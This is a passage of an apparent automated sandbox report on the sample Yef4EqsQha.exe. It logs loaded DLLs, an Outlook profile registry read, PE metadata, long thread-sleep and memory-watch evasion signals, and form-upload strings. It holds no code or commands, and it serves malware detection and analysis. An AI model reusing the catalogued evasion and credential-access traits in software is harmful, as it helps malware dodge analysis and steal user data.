                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: dpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                    Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32Jump to behavior
                    Source: Window RecorderWindow detected: More than 3 window changes detected
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                    Source: Yef4EqsQha.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: Yef4EqsQha.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: Yef4EqsQha.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: UIQk.pdbSHA256 source: Yef4EqsQha.exe
                    Source: Binary string: UIQk.pdb source: Yef4EqsQha.exe
                    Source: Yef4EqsQha.exeStatic PE information: 0xA6F3EF70 [Sat Oct 5 00:46:40 2058 UTC]
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF891E pushad ; iretd 6_2_00DF891F
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF8C2F pushfd ; iretd 6_2_00DF8C30
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeCode function: 6_2_00DF8DDF push esp; iretd 6_2_00DF8DE0
                    Source: Yef4EqsQha.exeStatic PE information: section name: .text entropy: 7.615593459072145

                    Hooking and other Techniques for Hiding and Protection

                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Process information set: NOOPENFILEERRORBOX
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX

                    Malware Analysis System Evasion

                    Source: Yara match File source: Process Memory Space: Yef4EqsQha.exe PID: 7640, type: MEMORYSTR
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: 1120000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: 2B10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: 4B10000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: 8E20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: 9E20000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: A030000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: B030000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: DF0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: 2930000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Memory allocated: F90000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 240000
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 239874
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 239747
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 239625
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 239486
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 239359
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 239250
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 239131
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 239000
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 238869
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 238684
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 600000
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 599875
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 599765
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 599656
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 599546
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 599437
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 599328
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 599218
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 599109
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 598999
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 598890
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 598781
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 598671
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe Thread delayed: delay time: 598562
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598453Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598343Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598234Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598124Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 598015Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597892Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597765Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597656Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597546Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597437Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597327Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597218Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 597095Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596968Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596851Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596734Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596585Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596479Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596359Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596250Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596140Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 596031Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595921Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595812Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595703Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595593Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595484Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595374Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595265Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595156Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 595046Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594937Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594827Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594718Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594609Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeThread delayed: delay time: 594500Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: threadDelayed 783Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: threadDelayed 1157Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5800Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3904Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: threadDelayed 2487Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: threadDelayed 7361Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exeWindow / User API: foregroundWindowGot 1714Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -4611686018427385s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -240000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239874s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239747s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239625s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239486s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239131s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -239000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -238869s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7676Thread sleep time: -238684s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 7660Thread sleep time: -922337203685477s >= -30000sJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep time: -6456360425798339s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep count: 39 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -600000s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599875s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8160Thread sleep count: 2487 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8160Thread sleep count: 7361 > 30Jump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599328s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -599109s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598999s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598890s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598781s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598671s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598562s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598453s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598343s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598234s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598124s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -598015s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597892s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597765s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597656s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597546s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597437s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597327s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597218s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -597095s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596968s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596851s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596734s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596585s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596479s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596359s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596250s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596140s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -596031s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595921s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595812s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595703s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595593s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595484s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595374s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595265s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595156s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -595046s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594937s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594827s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594718s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594609s >= -30000sJump to behavior
                    Source: C:\Users\user\Desktop\Yef4EqsQha.exe TID: 8124Thread sleep time: -594500s >= -30000sJump to behavior
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------900f91018e2e4d3
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fc8e9315e023f9
                    Source: Yef4EqsQha.exe, 00000006.00000002.3829533118.0000000000AF7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fb58a780d5a991
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fad9b476af8a79
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000616B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW3,2
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8fc160c527dc97c
                    Source: Yef4EqsQha.exe, 00000006.00000002.3837864810.000000000616B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------9033e39a452427c<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------901ea0d3c27a898<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------902fb2582420f72<
                    Source: Yef4EqsQha.exe, 00000006.00000002.3830796545.0000000002B96000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: qEmultipart/form-data; boundary=------------------------8f9ee912b64daf5
